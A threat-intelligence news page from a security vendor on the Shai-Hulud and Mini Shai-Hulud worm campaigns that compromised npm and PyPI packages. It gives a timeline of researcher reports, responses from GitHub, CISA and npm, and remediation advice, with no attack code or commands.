Shai-Hulud npm Worm Expanded Into Cross-Ecosystem Supply Chain Attacks
A supply-chain malware campaign known as Shai-Hulud compromised hundreds of packages in the npm ecosystem and later spread into both npm and PyPI, using stolen maintainer credentials and trusted publishing workflows to push trojanized releases. Early reporting said the worm affected more than 500 npm packages, searched infected developer and CI/CD environments for GitHub Personal Access Tokens, cloud API keys, and other secrets, and exfiltrated them to attacker-controlled infrastructure and public GitHub repositories. GitHub removed hundreds of malicious packages, while CISA urged organizations to review dependencies, check for cached malicious packages, rotate credentials, and enforce phishing-resistant MFA for developer accounts.
Later waves became more aggressive and broader in scope. Researchers said a second campaign hit hundreds more npm packages and had a blast radius exceeding 27,000 repositories, abusing preinstall and other lifecycle hooks to steal secrets, hijack GitHub Actions, self-propagate into additional packages, and in some cases deploy a conditional wiper-like payload. A subsequent Mini Shai-Hulud wave affected more than 170 packages across npm and PyPI, including packages tied to TanStack, Mistral AI, OpenSearch, Guardrails AI, UiPath, and others; it used files such as router_init.js, invoked Bun through malicious package scripts, targeted npm, GitHub, cloud, Kubernetes, Vault, and CI/CD credentials, and demonstrated that provenance and OIDC-based trusted publishing can still be abused when attacker-controlled code runs inside legitimate release workflows.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
13 events from the most recent confirmed update back to the earliest known activity.
Cynet publishes technical analysis and IOCs for Mini Shai-Hulud
Cynet released a detailed analysis of the latest Mini Shai-Hulud wave, describing JavaScript and Python variants, affected packages, and indicators including malicious hashes and the domain filev2.getsession.org. The report highlighted worm-like propagation, CI/CD targeting, and links to AI-assisted development workflows.
Aikido reports Mini Shai-Hulud expansion hitting 169 npm packages
Aikido reported that Mini Shai-Hulud had expanded into a broader npm compromise affecting 373 malicious package-version entries across 169 package names, including TanStack and Mistral-related packages. The report described credential theft, GitHub workflow abuse, and trusted publishing abuse via OIDC-minted npm tokens.
Mini Shai-Hulud campaign discovered across npm and PyPI
A new wave of the Shai-Hulud supply-chain campaign was discovered affecting both npm and PyPI, with more than 170 packages reportedly compromised. The malware targeted developer machines, CI/CD runners, and build systems to steal credentials and propagate through legitimate publishing workflows.
ZDI publicly discloses disputed npm and Discord issues
ZDI published its blog post detailing the disclosure timelines and technical dispute over two Windows-related module resolution and local attack issues involving npm CLI and Discord. The publication framed both as zero-day advisories after the vendors declined to treat them as security vulnerabilities.
ZDI tells Discord it will publish 0-day advisory
Following additional discussions in December 2025, ZDI notified Discord of its intent to publish a zero-day advisory for the disputed issue. Discord had maintained that the reported behavior was out of scope because it involved local attacks.
ZDI tells npm vendor it will publish 0-day advisory
After urging reassessment of the npm CLI issue, ZDI informed the vendor of its intent to publish a zero-day advisory. This followed the vendor's earlier position that the behavior was not a security vulnerability.
Researchers report broad impact from Shai-Hulud 2.0
Researchers said the second wave affected more than 27,000 repositories across about 350 users and included packages linked to organizations such as Zapier, ENS Domains, PostHog, and Postman. They also noted more aggressive capabilities including cross-victim exfiltration, self-healing, Linux privilege escalation, and a conditional destructive payload.
Second Shai-Hulud wave compromises npm packages
A second major campaign, dubbed Sha1-Hulud or Shai-Hulud 2.0, compromised hundreds of npm packages uploaded between November 21 and 23, 2025. Researchers said it abused compromised maintainer accounts and used preinstall execution to steal secrets and spread further.
CISA urges dependency reviews after Shai-Hulud attack
CISA warned organizations to monitor for malicious dependencies and cached packages following the npm ecosystem compromise. The agency recommended credential rotation, dependency checks, and phishing-resistant MFA for developer accounts.
GitHub removes malicious npm packages tied to Shai-Hulud
In response to the Shai-Hulud campaign, GitHub said it removed more than 500 packages from npm and blocked new packages containing the malware's indicators of compromise. This was part of mitigation efforts to contain the supply-chain attack.
Shai-Hulud compromises 500+ npm packages
A major npm supply-chain attack tracked as Shai-Hulud compromised more than 500 packages. The malware stole credentials such as GitHub personal access tokens and cloud API keys and exfiltrated them to attacker-controlled infrastructure and a public repository.
ZDI reports Discord local attack issue to vendor
ZDI notified Discord of a security issue involving behavior the company later classified as out of scope because it required local access. This began the disclosure process for the second disputed case described in the report.
ZDI reports npm CLI module-resolution issue to vendor
ZDI submitted a report about dangerous module resolution behavior involving npm CLI on Windows. The vendor acknowledged the report the same day and responded that the behavior was by design rather than a security issue.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
6 references tracked. Mallory keeps watching after this page renders.
Mini Shai-Hulud: Supply Chain Compromise in the Age of AI-Driven Development - Cynet
cynet.com
Open sourceMini Shai-Hulud Is Back: npm Worm Hits over 160 Packages, including Mistral and Tanstack
aikido.dev
Open sourceZero Day Initiative - Node.js Trust Falls: Dangerous Module Resolution on Windows
thezdi.com
Open sourceZero Day Initiative - Node.js Trust Falls: Dangerous Module Resolution on Windows
zerodayinitiative.com
Open sourceSecond Sha1-Hulud Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft
thehackernews.com
Open sourceCISA urges dependency checks following Shai-Hulud compromise | Cybersecurity Dive
cybersecuritydive.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Shai-Hulud Worm and Related Malicious NPM Package Attacks Targeting Software Supply Chains
A large-scale supply chain attack has targeted the Node Package Manager (NPM) ecosystem, compromising hundreds of widely used JavaScript packages and threatening the security of software development pipelines globally. In mid-September, cybersecurity researchers identified a self-propagating malware dubbed "Shai-Hulud," which was distributed through trojanized NPM packages, including some with millions of weekly downloads and high-profile packages such as those from CrowdStrike. The attack leveraged a malicious "bundle.js" script that downloaded and executed TruffleHog, a legitimate credential scanner, to harvest developer and CI/CD tokens, cloud service credentials, and environment variables from compromised systems. The stolen credentials were exfiltrated via hard-coded webhooks and GitHub Actions workflows, enabling the attacker to further propagate the malware and gain unauthorized access to sensitive resources. The campaign affected both Windows and Linux systems, increasing its reach and impact across diverse development environments. Sysdig reported that the attack on September 15 involved approximately 200 compromised packages, including @ctrl/tinycolor, and was linked to an attacker who had previously targeted Nx packages in late August. The worm not only stole secrets but also published them publicly on GitHub and attempted to make victim repositories public, amplifying the risk of further compromise. Earlier in the month, other popular packages such as chalk, debug, and duck were also compromised following a successful spear phishing attack against a maintainer, with the attacker seeking to redirect cryptocurrency payments. NPM responded by removing the malicious package versions, but users were required to update or revert to secure versions to mitigate the risk. Sysdig provided same-day threat intelligence and detection capabilities to its customers, including open source Falco rules to identify and respond to the threat. The attack demonstrated the vulnerability of even the most trusted and widely used open source packages, highlighting the importance of continuous monitoring and rapid response in the software supply chain. Security researchers and vendors emphasized the need for organizations to scan their environments for known malicious packages, such as dist.fezbox.cjs, and to review logs for signs of credential exfiltration. The incident underscored the evolving tactics of threat actors targeting developer ecosystems, using advanced techniques to automate propagation and maximize impact. Organizations relying on NPM packages and CI/CD pipelines were urged to remain vigilant, update dependencies promptly, and leverage threat intelligence resources to defend against similar attacks. The Shai-Hulud campaign remains an evolving threat, with ongoing analysis and mitigation efforts by the security community. This incident serves as a stark reminder that popularity and trust in open source packages do not guarantee safety, and proactive security measures are essential to protect software supply chains from compromise.
Mar 21, 2026
Mini Shai-Hulud Compromised Signed npm and PyPI Packages via GitHub Actions OIDC Abuse
A large software supply-chain campaign dubbed **Mini Shai-Hulud** compromised more than 170 npm packages and at least two PyPI packages tied to projects including **TanStack, Mistral AI, OpenSearch, UiPath, Guardrails AI,** and others. Researchers and vendors attributed the activity to **TeamPCP**, saying the attackers abused GitHub Actions release workflows—especially `pull_request_target`, cache poisoning, and theft of short-lived **OIDC** material from runners—to publish trojanized packages with apparently legitimate **SLSA** provenance, Sigstore attestations, and trusted-publishing signatures. Reports variously counted between roughly 160 and 400+ malicious package versions, with some affected packages totaling hundreds of millions of downloads, and OpenSearch and Mistral both confirmed compromised releases while TanStack described a chained workflow attack on its publishing pipeline. The malware targeted developer workstations and CI/CD systems, stealing **npm**, **GitHub**, cloud, Kubernetes, Vault, SSH, Docker, and AI-tool credentials, then attempting worm-like propagation by republishing infected packages with stolen tokens or workflow-issued publish credentials. Investigators said the payload also established persistence through **VS Code** tasks, **Claude Code** hooks, and in some cases system services, while exfiltrating data through **Session**, GitHub dead drops, and other attacker infrastructure; some variants included extortion notes, dead-man-switch logic, and geofenced destructive behavior. Defenders were urged to treat hosts that installed affected versions as potentially fully compromised, remove persistence before revoking tokens where applicable, rotate all exposed secrets from clean systems, invalidate CI caches, audit lockfiles and publishing activity, and rebuild impacted environments from trusted sources.
Jun 9, 2026
Mini Shai-Hulud Compromised Hundreds of npm Packages via Stolen Maintainer Tokens
Attackers linked by multiple researchers to **TeamPCP** hijacked the npm maintainer account `atool` and used it to publish roughly **639 malicious versions across 323 packages**, heavily impacting Alibaba’s **`@antv/*`** ecosystem as well as packages such as `echarts-for-react`, `timeago.js`, and `size-sensor`. Reports said the malware executed through malicious `preinstall` hooks and an obfuscated Bun-based payload, stealing secrets from developer workstations and CI/CD systems including GitHub, npm, AWS, Kubernetes, Vault, SSH, Docker, and database credentials. The campaign also abused GitHub tokens to create attacker-controlled repositories for exfiltration, scraped GitHub Actions runner memory for plaintext secrets, and in some cases targeted trusted tooling including a briefly compromised **Nx Console** VS Code extension. Researchers said the operation was worm-like and self-propagating, using stolen npm tokens to tamper with and republish additional packages under legitimate maintainer identities, with the broader **Mini Shai-Hulud** activity now tracked across npm, PyPI, and Composer. The malware reportedly established persistence in developer environments through modified VS Code and Claude Code settings and OS-level services, while some reports warned it also attempted to forge valid **Sigstore/SLSA provenance** using stolen CI identities. In response, **npm invalidated all write-enabled granular access tokens that bypassed two-factor authentication** and introduced **Staged Publishing** in preview, but researchers warned that any machine or pipeline that installed affected versions should be treated as fully compromised and all reachable credentials rotated immediately.
Jun 10, 2026